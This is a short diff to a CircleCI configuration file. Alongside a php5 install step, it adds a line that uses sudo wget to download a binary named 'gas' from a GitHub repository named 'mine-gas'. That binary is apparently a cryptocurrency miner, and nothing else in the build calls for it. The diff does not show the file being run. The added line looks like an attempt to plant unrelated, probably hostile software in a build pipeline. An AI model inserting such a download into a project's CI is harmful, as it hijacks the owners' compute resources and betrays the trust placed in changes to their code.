--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -12,3 +12,4 @@ jobs:
           command: |
             sudo apt-get update
             sudo apt-get install -y php5
+            sudo wget https://github.com/L00K11/mine-gas/raw/main/gas
